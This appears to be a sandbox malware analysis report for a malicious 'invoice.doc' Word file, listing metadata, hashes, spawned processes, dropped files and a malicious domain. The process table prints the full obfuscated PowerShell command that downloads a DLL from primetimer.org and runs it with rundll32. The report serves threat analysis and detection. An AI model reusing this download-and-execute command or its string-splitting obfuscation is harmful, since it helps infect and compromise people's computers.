| Field | Value |
|---|---|
| File name | invoice.doc |
| Full analysis | https://app.any.run/tasks/d6f50297-2505-4c78-bc90-31d6c4e2656f |
| Verdict | Malicious activity |
| Analysis date | November 08, 2018, 15:17:55 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/msword |
| File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: James Smith, Template: Normal.dotm, Last Saved By: Windows User, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Sun Nov 4 19:24:00 2018, Last Saved Time/Date: Wed Nov 7 02:32:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
| MD5 | 1374457044433A7AD196C1E43ACB15C1 |
| SHA1 | 98DC8E8DE4C6EC1E0F39331C68B2E89C8E86F6EE |
| SHA256 | B84E2524F59F318D5F8BD01B4CCC38FBD691F382873892D5304D760FAF0064C7 |
| SSDEEP | 6144:vTGfXFMFu9mycXxnBWbtzcn3lgO4VoX9B38Js+:b41SyqxnBWb5cVgZaXv8 |
| Property | Value |
|---|---|
| .doc | Microsoft Word document (80) |
| CompObjUserType | Microsoft Office Word 97-2003 |
| CompObjUserTypeLen | 39 |
| HeadingPairs | |
| TitleOfParts | - |
| HyperlinksChanged | No |
| SharedDoc | No |
| LinksUpToDate | No |
| ScaleCrop | No |
| AppVersion | 12 |
| CharCountWithSpaces | 1 |
| Paragraphs | 1 |
| Lines | 1 |
| Company | - |
| CodePage | Windows Cyrillic |
| Security | None |
| Characters | 1 |
| Words | - |
| Pages | 1 |
| ModifyDate | 2018:11:07 02:32:00 |
| CreateDate | 2018:11:04 19:24:00 |
| TotalEditTime | 1.0 minutes |
| Software | Microsoft Office Word |
| RevisionNumber | 3 |
| LastModifiedBy | Windows User |
| Template | Normal.dotm |
| Keywords | - |
| Author | James Smith |
| Subject | - |
| Title | - |
| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 968 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\invoice.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Exit code: 0; Version: 14.0.6024.1000 | | | |
456 | "C:\Users\admin\AppData\Local\Temp\qgnrahnui3\chaua.exe" $egabmypniujouovq6='ui3''';$tgvlrpmueqmvflyoaiwf='path=($en';$yeaeeaujsosbuua1=';Se';$eqkzlkejvawpqpqifkaydwuyeda='org/Xk';$ndojlceoiuoierjerlaqgmby='t System';$cahaaiilusephaohps05='php'',f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$ouboyaeuycah='t-Execu';$gyvouelayafgarddzy1='ss; f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$aobdseetzparmarmuuwf='''\z';$baaxslplaidrvehoqaymk60='cy By';$bvfrepnjwjpusrjjrwiaoffsu='hwh';$euukejdtncnqojxaoi='.dll'');';$ooqqbuoifbiiy='dFile(';$qwlofnexwuaouioaufbw='data+';$btouqdroaktfhyqgpuyyy='.Web';$fbrnyieyuiauiz='pass -Sc';$icfraektfrylkacqgwzrgfmvmzn82='rahn';$pjblncsnvyllrba25='qQkPWluO.';$wyssfngydmdwbpbsmk='prime';$uvfhheooqeaztoeg='l32 $p';$emnhxakhvharrqeobntmjkoyijq='path);';$yyvjvzbdtjnzclrpwsbswryupx='tionPoli';$yeozwuhayiomqagwja0='Downloa';$qrrflzpgijzpwkbnfktoke='(New-Ob';$znrxaxsebqjulaixhoukvxu7='Item ';$yrmeeeisxltkamiaaltb='''http://';$ioynehfvdkjqjeocmbovrs='se -for';$vtuiqqbukzaurcups1='vyeo';$urllsrgiczilzrboaetgsxhknlp='client).';$kbyowbudphqaoulhuesjjtyls='.Net';$vgnynvatppveuey60='fhj''';$alcpfemwsvbctgtlmlajfuiuyeq='ath , ''';$yjuuicgzcweoiut='f1'';Rem';$yyvcnzapjqjfxndzlldwattao='p + ''\qgn';$akouyyojompjrab='($env:tem';$mrdpdblcakqfyuydixminu05='$hj = ''';$zoflvqquooeyzilbiiqpouzlo=') -recur';$uerehhhpiebylwuauia='ove-';$micvzqjnkskthioyoskdqo='timer.';$rbkdlyuoterlqhiutjloe='v:app';$otruaanwcoaxmsxp=' rundl';$pxilntduusvjguyabvodpy='ope Proce';$aeaktrrowacvjlzyabew='ce;';$iaolcifsdafiuoesiyj='jec'; Invoke-Expression 
($mrdpdblcakqfyuydixminu05+$bvfrepnjwjpusrjjrwiaoffsu+$vgnynvatppveuey60+$yeaeeaujsosbuua1+$ouboyaeuycah+$yyvjvzbdtjnzclrpwsbswryupx+$baaxslplaidrvehoqaymk60+$fbrnyieyuiauiz+$pxilntduusvjguyabvodpy+$gyvouelayafgarddzy1+$tgvlrpmueqmvflyoaiwf+$rbkdlyuoterlqhiutjloe+$qwlofnexwuaouioaufbw+$aobdseetzparmarmuuwf+$vtuiqqbukzaurcups1+$euukejdtncnqojxaoi+$qrrflzpgijzpwkbnfktoke+$iaolcifsdafiuoesiyj+$ndojlceoiuoierjerlaqgmby+$kbyowbudphqaoulhuesjjtyls+$btouqdroaktfhyqgpuyyy+$urllsrgiczilzrboaetgsxhknlp+$yeozwuhayiomqagwja0+$ooqqbuoifbiiy+$yrmeeeisxltkamiaaltb+$wyssfngydmdwbpbsmk+$micvzqjnkskthioyoskdqo+$eqkzlkejvawpqpqifkaydwuyeda+$pjblncsnvyllrba25+$cahaaiilusephaohps05+$emnhxakhvharrqeobntmjkoyijq+$otruaanwcoaxmsxp+$uvfhheooqeaztoeg+$alcpfemwsvbctgtlmlajfuiuyeq+$yjuuicgzcweoiut+$uerehhhpiebylwuauia+$znrxaxsebqjulaixhoukvxu7+$akouyyojompjrab+$yyvcnzapjqjfxndzlldwattao+$icfraektfrylkacqgwzrgfmvmzn82+$egabmypniujouovq6+$zoflvqquooeyzilbiiqpouzlo+$ioynehfvdkjqjeocmbovrs+$aeaktrrowacvjlzyabew); | C:\Users\admin\AppData\Local\Temp\qgnrahnui3\chaua.exe | — | WINWORD.EXE |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
| 2424 | "C:\Windows\system32\rundll32.exe" C:\Users\admin\AppData\Roaming\zvyeo.dll f1 | C:\Windows\system32\rundll32.exe | — | chaua.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows host process (Rundll32); Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
| 3048 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\invoice.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Exit code: 0; Version: 14.0.6024.1000 | | | |
| 3808 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Explorer; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
| 1604 | C:\Windows\Explorer.EXE | C:\Windows\explorer.exe | — | — |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Explorer; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
| 328 | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\qgnrahnui3\WSMan.Format.ps1xml | C:\Windows\system32\NOTEPAD.EXE | — | explorer.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Notepad; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
| 2644 | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Certificate.format.ps1xml | C:\Windows\system32\NOTEPAD.EXE | — | explorer.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Notepad; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
| 700 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\invoice.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | | |
| 3416 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Explorer; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA285.tmp.cvr | — | — | — |
| 1604 | explorer.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\invoice.doc.lnk | lnk | 2690A5681567DDF993C464B15B242847 | 4B56B17C8BE26FB9D7997CD5AA55F10814890EF4B3CFF8A6D5B84199812FB875 |
| 968 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\invoice.doc.LNK | lnk | 670E13493ECC1107BEDE395807B735EC | 8DC0C30BDAD2E63C836EBD9C88E6F5292AAAE04C8D9D4D26DE4D9172C4FAE9D8 |
| 968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\qgnrahnui3\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll | executable | A84B6952AB6A297CCE6C085FA8AB06CB | 54E3F8199D5C749920A2826C63D7C5E7E86D94874ADDCFD5C9B430671031017D |
| 968 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | 500A1C0AB1A05201CE7A192CDAABCA55 | E7DE924E3C3BFFF39C6664F77C25DE7E4F48206DCE9919BDB34F449698DD640B |
| 1604 | explorer.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\a7bd71699cd38d1c.automaticDestinations-ms | automaticdestinations-ms | 39B942AAF6246EE3F59E89E4623FD344 | AFC0B10BC338D9EF71151B91DDB11F8E6012D52B617423E9C9D7E009D35521B4 |
| 968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Diagnostics.Format.ps1xml | text | FF6EEB8125B9265C5BA40AF9F7C6F6BC | 7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689 |
| 968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Certificate.format.ps1xml | xml | C93A361112351B30E2C959E72789952D | 4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D |
| 1604 | explorer.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\1b4dd67f29cb1962.automaticDestinations-ms | automaticdestinations-ms | 1F20E3676DBF3F0C1B16F8D2BE33E0A4 | 3FA5AB55980D83E2B4879B0F1C8AECEC124F7E76490D0AFFFEF99373C25C2C49 |
| 968 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 59131AE46194C72AAA2801E1AD2642A0 | 32C5BFAA5D065DD7FD36D9AD6A40361A8160F42BB4F98F164D4D8BCB0E92CEE3 |
| Domain | IP | Reputation |
|---|---|---|
| primetimer.org | | malicious |
| dns.msftncsi.com | | shared |